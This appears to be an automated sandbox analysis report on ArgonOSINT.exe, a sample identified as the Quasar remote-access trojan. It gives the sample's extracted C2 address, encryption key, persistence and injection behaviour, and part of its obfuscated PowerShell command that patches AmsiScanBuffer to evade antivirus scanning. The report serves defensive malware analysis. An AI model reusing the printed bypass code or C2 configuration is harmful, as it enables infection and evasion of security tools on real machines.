Analysis
-
max time kernel
12s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
04-05-2024 15:55
General
-
Target
ArgonOSINT.exe
-
Size
409KB
-
MD5
c4f70954d48c8653fde31fc63c619fc8
-
SHA1
c2fe0bc4eab66f6cbf19ab3a80817eba8084982e
-
SHA256
dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5
-
SHA512
1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc
-
SSDEEP
12288:UpyJcC+x6AoV5l+6KprKF/UV6u4W0pDs:kwd+mDsV6u4g
Malware Config
Extracted
quasar
3.1.5
Slave
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
BfQu2aop09VkjugTkmuc
-
install_name
$sxr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$sxr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4596-1-0x0000000000A20000-0x0000000000A8C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2524 created 576 2524 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
$sxr-powershell.exeinstall.exepid process 2000 $sxr-powershell.exe 3400 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 3 IoCs
Processes:
powershell.EXEsvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2524 set thread context of 3468 2524 powershell.EXE dllhost.exe -
Drops file in Windows directory 2 IoCs
Processes:
RuntimeBroker.exedescription ioc process File created C:\Windows\rescache\_merged\4129138312\2337188909.pri RuntimeBroker.exe File created C:\Windows\rescache\_merged\3060194815\1209253612.pri RuntimeBroker.exe -
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
RuntimeBroker.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 RuntimeBroker.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
SCHTASKS.exeschtasks.exeschtasks.exepid process 4980 SCHTASKS.exe 3056 schtasks.exe 3704 schtasks.exe -
Modifies data under HKEY_USERS 42 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE -
Modifies registry class 24 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Credential Manager" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\mmsys.cpl,-300#immutable1 = "Sound" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Firewall" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\intl.cpl,-3#immutable1 = "Region" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Color Management" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fhcpl.dll,-52#immutable1 = "File History" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\hgcpl.dll,-1#immutable1 = "HomeGroup" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\main.cpl,-102#immutable1 = "Keyboard" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Internet Options" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SensorsCpl.dll,-1#immutable1 = "Location Settings" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Default Programs" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "System" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Device Encryption" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recovery" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 2524 powershell.EXE 2524 powershell.EXE 2524 powershell.EXE 2524 powershell.EXE 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3416 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
ArgonOSINT.exepowershell.EXE$sxr-powershell.exedllhost.exeRuntimeBroker.exeExplorer.EXEDllHost.exedescription pid process Token: SeDebugPrivilege 4596 ArgonOSINT.exe Token: SeDebugPrivilege 2524 powershell.EXE Token: SeDebugPrivilege 2000 $sxr-powershell.exe Token: SeDebugPrivilege 2524 powershell.EXE Token: SeDebugPrivilege 3468 dllhost.exe Token: SeTakeOwnershipPrivilege 3980 RuntimeBroker.exe Token: SeRestorePrivilege 3980 RuntimeBroker.exe Token: SeShutdownPrivilege 3416 Explorer.EXE Token: SeCreatePagefilePrivilege 3416 Explorer.EXE Token: SeManageVolumePrivilege 4476 DllHost.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Explorer.EXEpid process 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ArgonOSINT.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 4596 wrote to memory of 3704 4596 ArgonOSINT.exe schtasks.exe PID 4596 wrote to memory of 3704 4596 ArgonOSINT.exe schtasks.exe PID 4596 wrote to memory of 3704 4596 ArgonOSINT.exe schtasks.exe PID 4596 wrote to memory of 2000 4596 ArgonOSINT.exe $sxr-powershell.exe PID 4596 wrote to memory of 2000 4596 ArgonOSINT.exe $sxr-powershell.exe PID 4596 wrote to memory of 2000 4596 ArgonOSINT.exe $sxr-powershell.exe PID 4596 wrote to memory of 3400 4596 ArgonOSINT.exe install.exe PID 4596 wrote to memory of 3400 4596 ArgonOSINT.exe install.exe PID 4596 wrote to memory of 3400 4596 ArgonOSINT.exe install.exe PID 4596 wrote to memory of 4980 4596 ArgonOSINT.exe SCHTASKS.exe PID 4596 wrote to memory of 4980 4596 ArgonOSINT.exe SCHTASKS.exe PID 4596 wrote to memory of 4980 4596 ArgonOSINT.exe SCHTASKS.exe PID 2000 wrote to memory of 3056 2000 $sxr-powershell.exe schtasks.exe PID 2000 wrote to memory of 3056 2000 $sxr-powershell.exe schtasks.exe PID 2000 wrote to memory of 3056 2000 $sxr-powershell.exe schtasks.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 2524 wrote to memory of 3468 2524 powershell.EXE dllhost.exe PID 3468 wrote to memory of 576 3468 dllhost.exe winlogon.exe PID 3468 wrote to memory of 652 3468 dllhost.exe lsass.exe PID 3468 wrote to memory of 736 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 928 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1004 3468 dllhost.exe dwm.exe PID 3468 wrote to memory of 432 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 392 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 892 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1096 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1152 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1176 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1196 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1208 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1364 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1404 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1412 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1456 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1480 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1572 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1604 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1620 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1744 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1752 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1764 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1808 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1868 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 1960 3468 dllhost.exe spoolsv.exe PID 3468 wrote to memory of 2032 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2224 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2232 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2248 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2348 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2388 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2480 3468 dllhost.exe sysmon.exe PID 3468 wrote to memory of 2500 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2516 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2532 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 2604 3468 dllhost.exe svchost.exe PID 3468 wrote to memory of 3012 3468 dllhost.exe unsecapp.exe PID 3468 wrote to memory of 3044 3468 dllhost.exe sihost.exe PID 3468 wrote to memory of 3064 3468 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b4eb1993-0b01-467a-a9ce-1fec32688fe3}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yIhBxOVWaPaP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gXFFKgMABqLmSh,[Parameter(Position=1)][Type]$wshtlkzLKc)$kgRVjzGtoaT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+'t'+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+'ule',$False).DefineType('M'+'y'+'D'+'e'+'l'+[Char](101)+'gat'+[Char](101)+'T'+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$kgRVjzGtoaT.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+'m'+'e'+[Char](44)+'Hid'+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$gXFFKgMABqLmSh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');$kgRVjzGtoaT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'Vi'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$wshtlkzLKc,$gXFFKgMABqLmSh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $kgRVjzGtoaT.CreateType();}$BqRVtcrDsYjVC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+'.'+'d'+''+'l'+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'in'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+'e'+'t'+'h'+[Char](111)+''+'d'+'s');$LrmnudhkbWtJVp=$BqRVtcrDsYjVC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'roc'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HrCzjRVOLHrIiaqSNGf=yIhBxOVWaPaP @([String])([IntPtr]);$RPiWTTDMJWmixFOhIbarIH=yIhBxOVWaPaP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UJmopAAFAmo=$BqRVtcrDsYjVC.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$gRNAsVwXkapNqV=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$UJmopAAFAmo,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+''+'r'+''+'a'+''+[Char](114)+'yA')));$RkyKQXcQErvRYAmWy=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$UJmopAAFAmo,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+'ct')));$TXlMYGa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gRNAsVwXkapNqV,$HrCzjRVOLHrIiaqSNGf).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'l'+''+'l'+'');$BizlGAzxknMzNcWBX=$LrmnudhkbWtJVp.Invoke($Null,@([Object]$TXlMYGa,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'uf'+[Char](102)+'e'+[Char](114)+'')));$zMqDdSYUbf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($Rk